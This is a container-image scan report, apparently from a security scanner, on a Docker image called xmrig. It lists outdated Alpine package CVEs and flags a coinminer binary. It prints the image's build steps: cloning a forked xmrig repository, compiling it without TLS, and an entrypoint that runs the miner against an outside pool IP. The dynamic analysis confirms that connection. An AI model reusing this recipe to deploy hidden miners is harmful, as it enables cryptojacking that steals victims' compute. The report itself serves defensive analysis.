xmrig

Region: us
Scan Summary
Critical vulnerabilities: 3
Malicious files: 1
Last scan: 1 year, 6 months ago
Type of scan: Prevasio CSPM
Scan duration: 39 seconds
Image Details
Image URI: us-docker.pkg.dev/peak-trilogy-360201/xmrig/xmrig2
Image tags: xmrig2
Digest: sha256:2e166be0abb74bda0d790d7293eff4a4876f283f4a8645c63a4f2c9b4a9716c5
Created: 4 years ago
Compressed size: 7.14 MB
Uncompressed size: 16.8 MB
OS/architecture: linux/amd64
OS distribution: alpine 3.10.1 (reached end of life)
Working directory: xmrig
ENTRYPOINT: /bin/sh -c "./xmrig-notls -o 144.202.64.8:442 -t 4"
CMD:
User:
Ports:
Volumes:
Environment variables: PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
Malicious files
Filename | File Size | SHA 256 | Threat Name | Report
/xmrig/xmrig-notls | 2.61 MB | 823c2e84089e5bfa5d15dfb63cb25c6f109d81b7977d07d485bc4960fbc5d24a | Multios.Coinminer.Miner-6781728-2 | VirusTotal
Overview
Critical: 3
High: 9
Medium: 14
Low: 4
Informational: 0
Vulnerabilities (30)
Severity | Name | Package | Version | Fixed in | Description | Package:version
Critical | CVE-2021-36159 | apk-tools | 2.10.4-r2 | 2.10.7-r0 | libfetch before 2021-07-26, as used in apk-tools, xbps, and other products, mishandles numeric strings for the FTP and HTTP protocols | apk-tools:2.10.4-r2
Critical | CVE-2019-14697 | musl | 1.1.22-r2 | 1.1.22-r3 | musl libc through 1.1.23 has an x87 floating-point stack adjustment im ... | musl:1.1.22-r2
Critical | CVE-2019-14697 | musl-utils | 1.1.22-r2 | 1.1.22-r3 | musl libc through 1.1.23 has an x87 floating-point stack adjustment im ... | musl-utils:1.1.22-r2
High | CVE-2021-30139 | apk-tools | 2.10.4-r2 | 2.10.6-r0 | In Alpine Linux apk-tools before 2.12.5, the tarball parser allows a buffer overflow and crash. | apk-tools:2.10.4-r2
High | CVE-2021-28831 | busybox | 1.30.1-r2 | 1.30.1-r5 | busybox: invalid free or segmentation fault via malformed gzip data | busybox:1.30.1-r2
High | CVE-2020-1967 | libcrypto1.1 | 1.1.1c-r0 | 1.1.1g-r0 | openssl: Segmentation fault in SSL_check_chain causes denial of service | libcrypto1.1:1.1.1c-r0
High | CVE-2021-23840 | libcrypto1.1 | 1.1.1c-r0 | 1.1.1j-r0 | openssl: integer overflow in CipherUpdate | libcrypto1.1:1.1.1c-r0
High | CVE-2021-3450 | libcrypto1.1 | 1.1.1c-r0 | 1.1.1k-r0 | openssl: CA certificate check bypass with X509_V_FLAG_X509_STRICT | libcrypto1.1:1.1.1c-r0
High | CVE-2020-1967 | libssl1.1 | 1.1.1c-r0 | 1.1.1g-r0 | openssl: Segmentation fault in SSL_check_chain causes denial of service | libssl1.1:1.1.1c-r0
High | CVE-2021-23840 | libssl1.1 | 1.1.1c-r0 | 1.1.1j-r0 | openssl: integer overflow in CipherUpdate | libssl1.1:1.1.1c-r0
High | CVE-2021-3450 | libssl1.1 | 1.1.1c-r0 | 1.1.1k-r0 | openssl: CA certificate check bypass with X509_V_FLAG_X509_STRICT | libssl1.1:1.1.1c-r0
High | CVE-2021-28831 | ssl_client | 1.30.1-r2 | 1.30.1-r5 | busybox: invalid free or segmentation fault via malformed gzip data | ssl_client:1.30.1-r2
Medium | CVE-2019-1547 | libcrypto1.1 | 1.1.1c-r0 | 1.1.1d-r0 | openssl: side-channel weak encryption vulnerability | libcrypto1.1:1.1.1c-r0
Medium | CVE-2019-1549 | libcrypto1.1 | 1.1.1c-r0 | 1.1.1d-r0 | openssl: information disclosure in fork() | libcrypto1.1:1.1.1c-r0
Medium | CVE-2019-1551 | libcrypto1.1 | 1.1.1c-r0 | 1.1.1d-r2 | openssl: Integer overflow in RSAZ modular exponentiation on x86_64 | libcrypto1.1:1.1.1c-r0
Medium | CVE-2020-1971 | libcrypto1.1 | 1.1.1c-r0 | 1.1.1i-r0 | openssl: EDIPARTYNAME NULL pointer de-reference | libcrypto1.1:1.1.1c-r0
Medium | CVE-2021-23841 | libcrypto1.1 | 1.1.1c-r0 | 1.1.1j-r0 | openssl: NULL pointer dereference in X509_issuer_and_serial_hash() | libcrypto1.1:1.1.1c-r0
Medium | CVE-2021-3449 | libcrypto1.1 | 1.1.1c-r0 | 1.1.1k-r0 | openssl: NULL pointer dereference in signature_algorithms processing | libcrypto1.1:1.1.1c-r0
Medium | CVE-2019-1547 | libssl1.1 | 1.1.1c-r0 | 1.1.1d-r0 | openssl: side-channel weak encryption vulnerability | libssl1.1:1.1.1c-r0
Medium | CVE-2019-1549 | libssl1.1 | 1.1.1c-r0 | 1.1.1d-r0 | openssl: information disclosure in fork() | libssl1.1:1.1.1c-r0
Medium | CVE-2019-1551 | libssl1.1 | 1.1.1c-r0 | 1.1.1d-r2 | openssl: Integer overflow in RSAZ modular exponentiation on x86_64 | libssl1.1:1.1.1c-r0
Medium | CVE-2020-1971 | libssl1.1 | 1.1.1c-r0 | 1.1.1i-r0 | openssl: EDIPARTYNAME NULL pointer de-reference | libssl1.1:1.1.1c-r0
Medium | CVE-2021-23841 | libssl1.1 | 1.1.1c-r0 | 1.1.1j-r0 | openssl: NULL pointer dereference in X509_issuer_and_serial_hash() | libssl1.1:1.1.1c-r0
Medium | CVE-2021-3449 | libssl1.1 | 1.1.1c-r0 | 1.1.1k-r0 | openssl: NULL pointer dereference in signature_algorithms processing | libssl1.1:1.1.1c-r0
Medium | CVE-2020-28928 | musl | 1.1.22-r2 | 1.1.22-r4 | In musl libc through 1.2.1, wcsnrtombs mishandles particular combinati ... | musl:1.1.22-r2
Medium | CVE-2020-28928 | musl-utils | 1.1.22-r2 | 1.1.22-r4 | In musl libc through 1.2.1, wcsnrtombs mishandles particular combinati ... | musl-utils:1.1.22-r2
Low | CVE-2019-1563 | libcrypto1.1 | 1.1.1c-r0 | 1.1.1d-r0 | openssl: information disclosure in PKCS7_dataDecode and CMS_decrypt_set1_pkey | libcrypto1.1:1.1.1c-r0
Low | CVE-2021-23839 | libcrypto1.1 | 1.1.1c-r0 | 1.1.1j-r0 | openssl: incorrect SSLv2 rollback protection | libcrypto1.1:1.1.1c-r0
Low | CVE-2019-1563 | libssl1.1 | 1.1.1c-r0 | 1.1.1d-r0 | openssl: information disclosure in PKCS7_dataDecode and CMS_decrypt_set1_pkey | libssl1.1:1.1.1c-r0
Low | CVE-2021-23839 | libssl1.1 | 1.1.1c-r0 | 1.1.1j-r0 | openssl: incorrect SSLv2 rollback protection | libssl1.1:1.1.1c-r0

Command

ADD file:0eb5ea35741d23fe39cbac245b3a5d84856ed6384f4ff07d496369ee6d960bad in /
Vulnerable packages, installed in this layer 4 years ago
apk-tools 2.10.4-r2 musl 1.1.22-r2 musl-utils 1.1.22-r2 busybox 1.30.1-r2 libcrypto1.1 1.1.1c-r0 libssl1.1 1.1.1c-r0 ssl_client 1.30.1-r2

Command

CMD ["/bin/sh"]

Command

RUN adduser -S -D -H -h /xmrig miner

Command

RUN apk --no-cache upgrade &&
    apk --no-cache add git cmake libuv-dev build-base &&
    git clone -b beta https://github.com/nguyennhatduy2608/xmrig.git &&
    cd xmrig &&
    mkdir build &&
    cmake -DCMAKE_BUILD_TYPE=Release -DWITH_TLS=OFF -DWITH_HTTPD=OFF . &&
    make &&
    apk del build-base cmake git

Command

WORKDIR /xmrig

Command

ENTRYPOINT ["/bin/sh" "-c" "./xmrig-notls -o 144.202.64.8:442 -t 4"]
Dynamic Analysis Results
The following graph outlines the most important system events generated by the container:
The container attempts to connect to the following remote hosts:
IP address | Domain | Location | Coordinates | ASN organization
144.202.64.8 | | Dallas, United States | 32.7889, -96.8021 | AS-CHOOPA
The container produces the following text output:
user@host: ~